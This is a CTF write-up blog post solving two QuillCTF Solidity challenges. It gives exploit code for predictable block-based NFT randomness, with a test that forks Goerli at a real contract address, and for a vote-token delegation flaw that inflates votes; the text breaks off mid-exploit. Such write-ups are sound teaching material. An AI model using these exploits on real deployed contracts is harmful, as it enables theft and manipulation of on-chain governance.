<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="19-Predictable-nft1Generating random numbers was difficult before the Oracles. People had to simulate randomness using built-in variables like &#96;sha3(block.number)&#96;.  Objective In this game, you can sp">
<meta property="og:type" content="article">
<meta property="og:title" content="QuillCTF-Last 14 Challenges">
<meta property="og:url" content="http://example.com/2024/01/23/QuillCTF-Last-14-Challenges/index.html">
<meta property="og:site_name" content="KK&#39;s Note">
<meta property="og:description" content="19-Predictable-nft1Generating random numbers was difficult before the Oracles. People had to simulate randomness using built-in variables like &#96;sha3(block.number)&#96;.  Objective In this game, you can sp">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2024-01-23T01:51:25.000Z">
<meta property="article:modified_time" content="2024-01-24T07:41:39.514Z">
<meta property="article:author" content="KKontheway">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>QuillCTF-Last 14 Challenges</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.0.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/kkontheway">Projects</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2024/01/23/QuillCTF-Summary/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/01/22/QuillCTF-10-Gate/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/01/23/QuillCTF-Last-14-Challenges/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/01/23/QuillCTF-Last-14-Challenges/&text=QuillCTF-Last 14 Challenges"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/01/23/QuillCTF-Last-14-Challenges/&title=QuillCTF-Last 14 Challenges"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/01/23/QuillCTF-Last-14-Challenges/&is_video=false&description=QuillCTF-Last 14 Challenges"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=QuillCTF-Last 14 Challenges&body=Check out this article: http://example.com/2024/01/23/QuillCTF-Last-14-Challenges/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/01/23/QuillCTF-Last-14-Challenges/&title=QuillCTF-Last 14 Challenges"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/01/23/QuillCTF-Last-14-Challenges/&title=QuillCTF-Last 14 Challenges"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/01/23/QuillCTF-Last-14-Challenges/&title=QuillCTF-Last 14 Challenges"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/01/23/QuillCTF-Last-14-Challenges/&title=QuillCTF-Last 14 Challenges"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/01/23/QuillCTF-Last-14-Challenges/&name=QuillCTF-Last 14 Challenges&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/01/23/QuillCTF-Last-14-Challenges/&t=QuillCTF-Last 14 Challenges"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#19-Predictable-nft"><span class="toc-number">1.</span> <span class="toc-text">19-Predictable-nft</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Objective"><span class="toc-number">1.1.</span> <span class="toc-text">Objective</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Code"><span class="toc-number">1.2.</span> <span class="toc-text">Code</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Observation"><span class="toc-number">1.3.</span> <span class="toc-text">Observation</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Attack"><span class="toc-number">1.4.</span> <span class="toc-text">Attack</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#20-VotingMachine"><span class="toc-number">2.</span> <span class="toc-text">20-VotingMachine</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Objective-1"><span class="toc-number">2.1.</span> <span class="toc-text">Objective</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Code-1"><span class="toc-number">2.2.</span> <span class="toc-text">Code</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Observation-1"><span class="toc-number">2.3.</span> <span class="toc-text">Observation</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Attack-1"><span class="toc-number">2.4.</span> <span class="toc-text">Attack</span></a></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        QuillCTF-Last 14 Challenges
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">KKontheway</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-01-23T01:51:25.000Z" class="dt-published" itemprop="datePublished">2024-01-23</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/QuillCTF/">QuillCTF</a>
    </div>


      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h1 id="19-Predictable-nft"><a href="#19-Predictable-nft" class="headerlink" title="19-Predictable-nft"></a>19-Predictable-nft</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Generating random numbers was difficult before the Oracles. People had to simulate randomness using built-in variables like `sha3(block.number)`.</span><br></pre></td></tr></table></figure>

<h2 id="Objective"><a href="#Objective" class="headerlink" title="Objective"></a>Objective</h2><ul>
<li>In this game, you can spend 1 ether to “mint” an NFT token with 3 possible ranks: Common(1), Rare(2), and Superior(3). As a hacker, your goal is to always mint the Superior ones.</li>
</ul>
<h2 id="Code"><a href="#Code" class="headerlink" title="Code"></a>Code</h2><p>its only give the address on the goerli , we need decompile it .</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0xFD3CbdbD9D1bBe0452eFB1d1BFFa94C8468A66fC</span><br></pre></td></tr></table></figure>

<p>dedaub:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line">// Decompiled by library.dedaub.com</span><br><span class="line">// 2024.01.09 05:53 UTC</span><br><span class="line">// Compiled using the solidity compiler version 0.8.19</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">// Data structures and variables inferred from the use of storage instructions</span><br><span class="line">uint256 _id; // STORAGE[0x0]</span><br><span class="line">mapping (uint256 =&gt; uint256) _tokens; // STORAGE[0x1]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">function function_selector() public payable &#123; </span><br><span class="line">    revert();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function mint() public payable &#123; </span><br><span class="line">    require(10 ** 18 == msg.value, Error(&#x27;show me the money&#x27;));</span><br><span class="line">    require(_id &lt;= 1 + _id, Panic(17)); // arithmetic overflow or underflow</span><br><span class="line">    _id += 1;</span><br><span class="line">    require(100, Panic(18)); // division by zero</span><br><span class="line">    if (keccak256(_id, msg.sender, block.number) % 100 &lt;= 90) &#123;</span><br><span class="line">        if (keccak256(_id, msg.sender, block.number) % 100 &lt;= 80) &#123;</span><br><span class="line">            v0 = v1 = 1;</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            v0 = v2 = 2;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        v0 = v3 = 3;</span><br><span class="line">    &#125;</span><br><span class="line">    _tokens[_id] = v0;</span><br><span class="line">    return _id;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function tokens(uint256 varg0) public nonPayable &#123; </span><br><span class="line">    require(msg.data.length - 4 &gt;= 32);</span><br><span class="line">    return _tokens[varg0];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function id() public nonPayable &#123; </span><br><span class="line">    return _id;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">// Note: The function selector is not present in the original solidity code.</span><br><span class="line">// However, we display it for the sake of completeness.</span><br><span class="line"></span><br><span class="line">function function_selector( function_selector) public payable &#123; </span><br><span class="line">    MEM[64] = 128;</span><br><span class="line">    if (msg.data.length &gt;= 4) &#123;</span><br><span class="line">        if (0x1249c58b == function_selector &gt;&gt; 224) &#123;</span><br><span class="line">            mint();</span><br><span class="line">        &#125; else if (0x4f64b2be == function_selector &gt;&gt; 224) &#123;</span><br><span class="line">            tokens(uint256);</span><br><span class="line">        &#125; else if (0xaf640d0f == function_selector &gt;&gt; 224) &#123;</span><br><span class="line">            id();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    fallback();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="Observation"><a href="#Observation" class="headerlink" title="Observation"></a>Observation</h2><p>Our objective is to always mint the superior ones . which means to mint type 3 NFTs.</p>
<p>Our main focus is the <code>mint()</code> fn. The first <code>if</code> statement checks wether <code>uint256</code> of <code>keccak256</code> of hash <code>_id, msg.sender, block.number</code> parameters has the last <code>2</code> digits are less than or equal to <code>90</code> if so then it checks if it’s less than or equal to <code>80</code> or not. If so then mint type <code>1</code> else mint type <code>2</code> or if none of those mint <code>3</code>. So we have to check if the unsigned int has the last 2 digits greater than <code>90</code>, only then we can mint type <code>3</code> NFTs.</p>
<h2 id="Attack"><a href="#Attack" class="headerlink" title="Attack"></a>Attack</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line">// SPDX-License-Identifier: MIT</span><br><span class="line">pragma solidity ^0.8.19;</span><br><span class="line"></span><br><span class="line">import &quot;forge-std/Test.sol&quot;;</span><br><span class="line">import &quot;../src/INFT.sol&quot;;</span><br><span class="line">import &quot;forge-std/console.sol&quot;;</span><br><span class="line"></span><br><span class="line">interface INFT &#123;</span><br><span class="line">    function mint() external payable;</span><br><span class="line">    function tokens(uint256 _id) external view returns (uint256);</span><br><span class="line">    function id() external view returns (uint256);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">contract PredictableNFTTest is Test &#123;</span><br><span class="line">    INFT nft;</span><br><span class="line">    address hacker = address(0x1337);</span><br><span class="line">    function setUp() public &#123;</span><br><span class="line">        vm.createSelectFork(</span><br><span class="line">            &quot;https://goerli.infura.io/v3/&lt;api_key&gt;&quot;</span><br><span class="line">        );</span><br><span class="line">        vm.deal(hacker, 1 ether);</span><br><span class="line">        nft = INFT(0xFD3CbdbD9D1bBe0452eFB1d1BFFa94C8468A66fC);</span><br><span class="line">    &#125;</span><br><span class="line">    function test() public &#123;</span><br><span class="line">        vm.startPrank(hacker);</span><br><span class="line">        uint mintedId;</span><br><span class="line">        uint currentBlockNum = block.number;</span><br><span class="line">        // console.log(msg.sender);</span><br><span class="line">        // console.log(address(hacker));</span><br><span class="line">        mintedId = nft.id();</span><br><span class="line">        // console.log(mintedId);</span><br><span class="line">        // Mint a Superior one, and do it within the next 100 blocks.</span><br><span class="line">        for (uint i = 0; i &lt; 100; i++) &#123;</span><br><span class="line">            vm.roll(currentBlockNum);</span><br><span class="line">            // ---- hacking time ----</span><br><span class="line">            uint256 jadu = uint256(</span><br><span class="line">                keccak256(</span><br><span class="line">                    abi.encode(mintedId + 1, address(hacker), block.number)</span><br><span class="line">                )</span><br><span class="line">            );</span><br><span class="line">            if (jadu % 100 &gt; 90) &#123;</span><br><span class="line">                nft.mint&#123;value: 1 ether&#125;();</span><br><span class="line">                console.log(&quot;Minted ID: &quot;, nft.id());</span><br><span class="line">                console.log(&quot;Minted Rank: &quot;, nft.tokens(nft.id()));</span><br><span class="line">                break;</span><br><span class="line">            &#125;</span><br><span class="line">            currentBlockNum++;</span><br><span class="line">        &#125;</span><br><span class="line">        mintedId = nft.id();</span><br><span class="line">        uint mintedRank = nft.tokens(mintedId);</span><br><span class="line">        assertEq(mintedRank, 3, &quot;not Superior(rank != 3)&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>Why use abi.encode?<br> That’s because <code>abi.encodePacked</code> does’t add any padding &amp; if 2 dynamic data types are together then it can lead to <code>hash collision</code> to high probability the original contract haven’t used this.</p>
<h1 id="20-VotingMachine"><a href="#20-VotingMachine" class="headerlink" title="20-VotingMachine"></a>20-VotingMachine</h1><hr>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vToken is a governance token that allows holders to vote on proposals for the community. As a hacker, you have proposed a malicious proposal and now you need 3000 votes to get it accepted in your favor.</span><br></pre></td></tr></table></figure>

<h2 id="Objective-1"><a href="#Objective-1" class="headerlink" title="Objective"></a>Objective</h2><ul>
<li><p>Accumulate at least 3000 votes in your hacker address. You don’t have any tokens in your wallet.</p>
</li>
<li><p>After trying all attempts and failing, you decided to perform a phishing attack and you successfully obtained the private keys from three users: Alice , Bob, and Carl.</p>
</li>
<li><p>Fortunately, Alice had 1000 vTokens, but Bob and Carl don’t have any tokens in their accounts. (see foundry setUp)</p>
</li>
<li><p>Now that you have access to the private keys of Alice, Bob, and Carl’s accounts. So, try again.</p>
</li>
</ul>
<h2 id="Code-1"><a href="#Code-1" class="headerlink" title="Code"></a>Code</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity 0.8.12;</span><br><span class="line"></span><br><span class="line">import &quot;@openzeppelin-contracts/contracts/token/ERC20/ERC20.sol&quot;;</span><br><span class="line"></span><br><span class="line">contract VoteToken is ERC20(&quot;Vote Token&quot;, &quot;vToken&quot;) &#123;</span><br><span class="line"></span><br><span class="line">    address public owner;</span><br><span class="line"></span><br><span class="line">    modifier onlyOwner() &#123;</span><br><span class="line">        require(owner == msg.sender);</span><br><span class="line">        _;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    constructor() &#123;</span><br><span class="line">        owner = msg.sender;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function mint(address _to, uint256 _amount) public onlyOwner &#123;</span><br><span class="line">        _mint(_to, _amount);</span><br><span class="line">        _moveDelegates(address(0), _delegates[_to], _amount);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function burn(address _from, uint256 _amount) public onlyOwner &#123;</span><br><span class="line">        _burn(_from, _amount);</span><br><span class="line">        _moveDelegates(_delegates[_from], address(0), _amount);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    mapping(address =&gt; address) internal _delegates;</span><br><span class="line"></span><br><span class="line">    struct Checkpoint &#123;</span><br><span class="line">        uint32 fromBlock;</span><br><span class="line">        uint256 votes;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    function _moveDelegates(address from, address to, uint256 amount) internal &#123;</span><br><span class="line">        if (from != to &amp;&amp; amount &gt; 0) &#123;</span><br><span class="line">            if (from != address(0)) &#123;</span><br><span class="line">                uint32 fromNum = numCheckpoints[from];</span><br><span class="line">                uint256 fromOld = fromNum &gt; 0 ? checkpoints[from][fromNum - 1].votes : 0;</span><br><span class="line">                uint256 fromNew = fromOld - amount;</span><br><span class="line">                _writeCheckpoint(from, fromNum, fromOld, fromNew);</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            if (to != address(0)) &#123;</span><br><span class="line">                uint32 toNum = numCheckpoints[to];</span><br><span class="line">                uint256 toOld = toNum &gt; 0 ? checkpoints[to][toNum - 1].votes : 0;</span><br><span class="line">                uint256 toNew = toOld + amount;</span><br><span class="line">                _writeCheckpoint(to, toNum, toOld, toNew);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    mapping(address =&gt; mapping(uint32 =&gt; Checkpoint)) public checkpoints;</span><br><span class="line">    mapping(address =&gt; uint32) public numCheckpoints;</span><br><span class="line"></span><br><span class="line">    function delegates(address _addr) external view returns (address) &#123;</span><br><span class="line">        return _delegates[_addr];</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function delegate(address _addr) external &#123;</span><br><span class="line">        return _delegate(msg.sender, _addr);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    function getVotes(address _addr) external view returns (uint256) &#123;</span><br><span class="line">        uint32 nCheckpoints = numCheckpoints[_addr];</span><br><span class="line">        return nCheckpoints &gt; 0 ? checkpoints[_addr][nCheckpoints - 1].votes : 0;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function _delegate(address _addr, address delegatee) internal &#123;</span><br><span class="line">        address currentDelegate = _delegates[_addr];</span><br><span class="line">        uint256 _addrBalance = balanceOf(_addr);</span><br><span class="line">        _delegates[_addr] = delegatee;</span><br><span class="line">        _moveDelegates(currentDelegate, delegatee, _addrBalance);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    function _writeCheckpoint(address delegatee, uint32 nCheckpoints, uint256 oldVotes, uint256 newVotes) internal &#123;</span><br><span class="line">        uint32 blockNumber = uint32(block.number);</span><br><span class="line"></span><br><span class="line">        if (nCheckpoints &gt; 0 &amp;&amp; checkpoints[delegatee][nCheckpoints - 1].fromBlock == blockNumber) &#123;</span><br><span class="line">            checkpoints[delegatee][nCheckpoints - 1].votes = newVotes;</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            checkpoints[delegatee][nCheckpoints] = Checkpoint(blockNumber, newVotes);</span><br><span class="line">            numCheckpoints[delegatee] = nCheckpoints + 1;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="Observation-1"><a href="#Observation-1" class="headerlink" title="Observation"></a>Observation</h2><p>Through the foundrySetup code ,we can see that we have the private key of 4 accounts <code>alice</code> <code>bob</code> <code>carl</code> and <code>hacker</code> . <code>Alice</code> have 1000 vTokens.</p>
<p>The Objective is Hacker need to have 3000 Votes and 1000 vTokens.<br>We can easily have 1000 vTokens ,but how can we get 3000 Votes.</p>
<p>we can find <code>delegate</code> function ,it call <code>_delegate</code> and then call the <code>_moveDelegates</code> -&gt; <code>_writeCheckpoint</code>.It can be seen that whenever any user calls <code>delegate</code> function it overwrites the current delegation settings with the new given <code>delegatee</code> address.</p>
<p>But we can not call this function three times.it does not work.</p>
<p>After read the contract i found that the <code>getVotes</code> function does not check the <code>checkpoints</code> is valid or not .so we can do simple transfer from four account!!!</p>
<h2 id="Attack-1"><a href="#Attack-1" class="headerlink" title="Attack"></a>Attack</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line">// SPDX-License-Identifier: UNLICENSED</span><br><span class="line">pragma solidity ^0.8.12;</span><br><span class="line"></span><br><span class="line">import &quot;forge-std/Test.sol&quot;;</span><br><span class="line">import &quot;../src/Voting-machine/VotingMachine.sol&quot;;</span><br><span class="line"></span><br><span class="line">contract exploitTest is Test &#123;</span><br><span class="line">    VoteToken vToken;</span><br><span class="line">    address public owner = address(0);</span><br><span class="line">    address public hacker = address(1337);</span><br><span class="line"></span><br><span class="line">    address public alice = address(1);</span><br><span class="line">    address public bob = address(2);</span><br><span class="line">    address public carl = address(3);</span><br><span class="line"></span><br><span class="line">    function setUp() public &#123;</span><br><span class="line">        vm.startPrank(owner);</span><br><span class="line">        vToken = new VoteToken();</span><br><span class="line">        vToken.mint(alice, 1000);</span><br><span class="line">        vm.stopPrank();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function testExploitVote() public &#123;</span><br><span class="line">        // soluiton</span><br><span class="line">        vToken.delegate(hacker);</span><br><span class="line">        vToken.transfer(bob, vToken.balanceOf(alice));</span><br><span class="line"></span><br><span class="line">        vm.stopPrank();</span><br><span class="line"></span><br><span class="line">        vm.startPrank(bob);</span><br><span class="line">        vToken.delegate(hacker);</span><br><span class="line">        vToken.transfer(carl, vToken.balanceOf(bob));</span><br><span class="line"></span><br><span class="line">        vm.stopPrank();</span><br><span class="line"></span><br><span class="line">        vm.startPrank(carl);</span><br><span class="line">        vToken.delegate(hacker);</span><br><span class="line">        vToken.transfer(hacker, vToken.balanceOf(carl));</span><br><span class="line"></span><br><span class="line">        vm.stopPrank();</span><br><span class="line"></span><br><span class="line">        uint256 hacker_vote = vToken.getVotes(hacker);</span><br><span class="line">        console.log(&quot;Vote Count of Hacker before attack: %s &quot;, hacker_vote);</span><br><span class="line"></span><br><span class="line">        uint256 hacker_balance = vToken.balanceOf(hacker);</span><br><span class="line">        